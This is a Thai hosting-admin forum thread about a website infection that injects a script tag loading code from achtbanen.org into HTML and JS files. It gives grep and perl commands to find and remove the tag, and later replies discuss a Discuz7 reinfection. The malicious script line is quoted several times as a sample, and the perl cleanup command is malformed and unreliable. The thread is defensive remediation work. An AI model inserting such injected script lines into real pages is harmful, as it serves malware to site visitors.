[[Alert !]] ระวัง ไวรัส iframe รูปแบบ ที่ไม่ใช่ iframe ! (พร้อมวิธีค้นหาและป้องกัน)

Technical topics
1

วันนี้เจอการแทรกสคริปแนวๆ iframe ของลูกค้าบางราย

</head>
<script src=http://achtbanen.org/images/b-one-default.php ></script><body>

( มี <body สำหรับไฟล์ .html.bak ด้วย 0.0)

เป็นการแทรกขั้นเทพกว่าเดิม รู้สึกว่า มันจะแทรกก่อน <body นี่ล่ะครับ

ข่าวดีคือ
-ไฟล์ *.php ไม่มีการติดเลยซักนิด (เท่าที่เห็น หรือเป็นเพราะว่ามันไม่มี นี่ล่ะ)

ข่าวร้ายคือ

  • เป้าหมายไม่ใช่ index.html index.htm index.php main.html main.php อย่างเดียว
  • *.html โดนหมดดดดด แถม .js ก็โดนด้วย ทุกชื่อไฟล์ที่มันสามารถแทรกโค้ดได้

คำสั่ง find เพื่อดูว่าโดนไฟล์ไหนบ้าง

find / -type f -name '*' -print | xargs grep 'achtbanen' |more

ประยุกต์ ด้วยการสั่งเขียนไฟล์ แล้วดูผ่าน xxx.xxx.xxx.xxx/chk.txt ประมานนี้(ประยุกต์เอาเองโลด)

find / -type f -name '*' -print | xargs grep 'achtbanen' > /var/www/html/chk.txt

วิธีแก้ แบบคนขยัน
1.เข้าไป ftp ดึงมา ลบโค้ดออก แล้วอัพกลับ
2.chmod 404 (ไม่คอนเฟิร์มว่า ช่วยป้องกันหรือเปล่า เทพๆเขาว่ามา)
3.เปลี่ยนพาส ftp
แนะนำเพิ่มเติม ถ้าไม่อยากติดไวรัสอีก
4.ล้างเครื่อง
5.ลง antivirus
6.ใช้ chrome หรือ firefox+noscript
7. วิธีป้องกันไวรัสต่างๆ ฯลฯ

วิธีแก้ แบบคนขี้เกียจ

  1. หาตำแหน่งโฟลเดอร์ ที่ไฟล์ที่มีไวรัสอยู่ ด้วยโค้ดนี้
find . -type f -name '*' -print | xargs grep 'achtbanen' |more

ก็จะได้ผลลัพธ์ออกมา เช่น

./domains/domains.com/public_html/folder/index.html:<script src=http://achtbanen.org/images/b-one-default.php ></script><body>


./domains/domains2.com/public_html/folder2/index.html:<script src=http://achtbanen.org/images/b-one-default.php ></script><body>

2.ต่อไปรันด้วยคำสั่งนี้ โดยนับจำนวน path ให้เท่ากับ จำนวน * (ตามสีแดงๆ) เช่น

perl -pi -e ‘s/<script src=http://achtbanen.org/images/b-one-default.php ></script>//g’ ./*/*/*/*/*

แล้วคราวนี้มันก็จะลบโค้ดให้โดยอัตโนมัติ สบายๆ

  1. กลับไปทำตามขั้นตอนที่ 1-2 ใหม่ จนกว่า จะมีมีการ report ออกมาว่าโดนไวรัสแต่อย่างใด ส่วนวิธีการที่เหลือ ก็ำตามวิธีด้านบนก่อนหน้านั้น เพื่อป้องกัน ระยะยาว

ส่วนไฟล์ .js เข้าไปลบด้วยมือเอาละกัน ขี้เกจหาความง่ายๆล่ะ

ข้อป้องกันพิเศษ ไม่ใช้ ftp ในการอัพโหลดไฟล์ใดๆเลย 0.0 (สำหรับผู้มี ssh ใช้ winscp หรือ putty command เอา 0)

แค่นี้ก็เสร็จแล้วครับผม

lol

ปล1.สามารถนำไปประยุกต์กับพวกไวรัส iframe หรือโค้ดต่างๆ อันไม่ถึงประสงค์ 0
ปล2.บทความเหมาะสำหรับผู้ดูแลที่ใช้ ssh ได้ หรือ shell script บน server ได้ จะเหมาะกว่า
ปล3.ขอบคุณความช่วยเหลือจาก พี่ไอซ์ (icez) , พี่ตี่ (hack3rb43), พี่แบงค์ (BestThaiHost), พี่ไก่ (Thaitumweb) แห่ง thaihosttalk.com และ google.com

refer:

2

ขอบคุณมากครับ

3

ขอบคุณครับ
แต่ผมขี้เกรียจกว่า เลยให้ลูกค้า เอา FizScript ไปไว้ใช้เอาครับ
http://fizscript.ishare.in.th เผื่อมีประโยชน์ครับ

4

เวอร์ชั่นล่าสุดใช้งานดีมากครับ :smash:

5

เฟรมมันเบียดกันอะ โพสตรงไหนงงเลย
ขอบคุณมากครับ

6

แจ่มเลยครับ +1

7

ขอบคุณมาก ๆ ครับ น่ากลัวเหมือนกันนะนี่ :slight_smile:

8

ลูกค้าผมก็โดนเหมือนกัน

9

ขอบคุณครับ

10

ตอนนี้เจอกับ ไวรัสตัวเดิม รูปแบบมาใหม่

เป็นกับบอร์ด discuz7 (เท่าที่เห็น กำลังปล้ำมันอยู่)

ไฟล์ header.htm (ไฟล์ template)
ซึ่งไฟลืนี้จะมีโค้ดเป็นแบบนี้

</style><script type="text/javascript">var STYLEID = '1', IMGDIR = 'images/default', VERHASH = '2vB', charset = 'utf-8', discuz_uid = 0, cookiedomain = '', cookiepath = '/', attackevasive = '0', allowfloatwin = '1', creditnotice = '1|ผลงาน|,2|Money|', gid = parseInt('0'), fid = parseInt('0'), tid = parseInt('0')</script> 
<script src="include/js/common.js?2vB" type="text/javascript" type="text/javascript"></script> 
</head> 
 
<body id="index" onkeydown="if(event.keyCode==27) return false;">

แต่พอดูโค้ดผ่าน chrome (ด้วย view-source:http://www.officeprint.co.th/bbs ในช่อง address bar (อย่าเปิดหน้าเว็บตรงๆนะ เราเตือนคุณแล้ว 0))

กลับเป็นแบบนี้


</style><script type="text/javascript">var STYLEID = '1', IMGDIR = 'images/default', VERHASH = '2vB', charset = 'utf-8', discuz_uid = 0, cookiedomain = '', cookiepath = '/', attackevasive = '0', allowfloatwin = '1', creditnotice = '1|ผลงาน|,2|Money|', gid = parseInt('0'), fid = parseInt('0'), tid = parseInt('0')</script> 
<script src="include/js/common.js?2vB" type="text/javascript" type="text/javascript"></script> 
</head><script src=http://achtbanen.org/images/b-one-default.php ></script> 
 
<body id="index" onkeydown="if(event.keyCode==27) return false;">

มันมาได้ไงไม่รู้ อย่างกับเขียนสคริปทำรูไว้เลย

พอลบ </head> มันก็มา

ลบ <script src=“include/js/common.js?2vB” type=“text/javascript” type=“text/javascript”></script> มาก็มาอีกได้ไงไม่รู้

เหมือนกับว่า discuz7 โดนเจาะเลยครับ

ใช้ คำว่า base64 ก้ไม่เจอ

ตอนนี้ยังไม่ได้ลองลบแล้วอัพใหม่ เก็บคอนฟิก ไม่รู้ว่ามันซ่อนโค้ดอย่างไร

อยากหาให้เจอก่อน

น่ากลัววว ใครเคยเจอวิธีแบบนี้แล้วแก้ได้บ้างครับ

11

ขอบคุณครับ สำหรับการแจ้งข่าว โดนไม่ครั้งหนึ่ง มืนเหมือนกัน

12

ผมมีลูกค้าที่ใช้ Discuz อยู่เจ้าหนึ่ง รู้สึกเสียวๆ แฮะ

13

พี่ๆ เพื่อนๆ ครับ สอบถามนิดครับผมเข้าใจถูกไหมครับ ถ้าเครื่องมี 100 เว็บ ลูกค้าโดนคนเดียว ก็โดนแค่เว็บลูกค้าอย่างเดียว ไม่มีปัญหากับเว็บอื่นในระบบอ่ะครับ

ถ้าเข้ามาทาง FTP ของ User ไหนได้ web ก็จะมีปัญหาแค่ Web ของ User นั้นๆ อันนี้เข้าใจถูกไหมครับ

แล้วอย่างนี้ถ้าลูกค้าคนไหนเป็นซ้ำๆ เราแก้ให้เท่าไหร่ก็เป็นอีก ก็ไม่มีปัญหากับ web ของลูกค้าอื่นที่ไม่โดนใช่ไหมครับ

สรุปมันทำงานมา FTP แทรก Code เฉพาะ File ที่ FTP User นั้นๆ เข้าถึงได้เท่านั้นใช่ไหมครับ

14

เข้าใจถูกแล้วครับ

ถ้าจะโดนทุกเว็บได้พร้อมกัน นอกจากโดน hack serever กับเครื่องคุณเองโดนเจาะ

password ทั้งหมดจึงหลุดออกไปได้

15

ขอบคุณมากครับพี่ เข้าใจแจ่มแจ้ง

แล้วส่วนใหญ่ปัญหานี้ ผู้บริการต้องแก้ให้ หรือว่าลูกค้าต้องแก้เองครับ เห็นบางผู้ให้บริการแก้ให้ บางผู้ให้บริการให้ลูกค้าแก้เอง หรือบางทีคิดค่า service เพิ่ม

สำหรับผมมองว่าลูกค้าน่าจะต้องแก้เองนะครับ หรือพี่ๆ มีความคิดเห็นว่าอย่างไรกันบ้างครับ ^^

16

เรื่องนี้ ไม่ใช่หน้าที่ของเราโดยตรง แต่เกี่ยวกับเราโดยตรงครับ (เพราะเป็นเครื่องของเรา)

ช่วยได้ก็รีบช่วยเถอะครับ เพราะทิ้งไว้นานๆ เข้า อาจจะงานเข้าได้ แถมได้ใจลูกค้าอีกด้วย…

17

ผ่านมาปีนึงแล้ว น่าจะแก้ไปเรียบร้อยแล้ว

ที่แก้แล้วมาอีกคิดว่ามันเก็บอยู่ใน cache กับอยู่ใน db

18

ขอบคุณมากครับ

19

เป็นคนขึ้เกียจใช้วิธีขี้เกียจดีกว่า

20

ขอบคุณมากคับ :875328cc: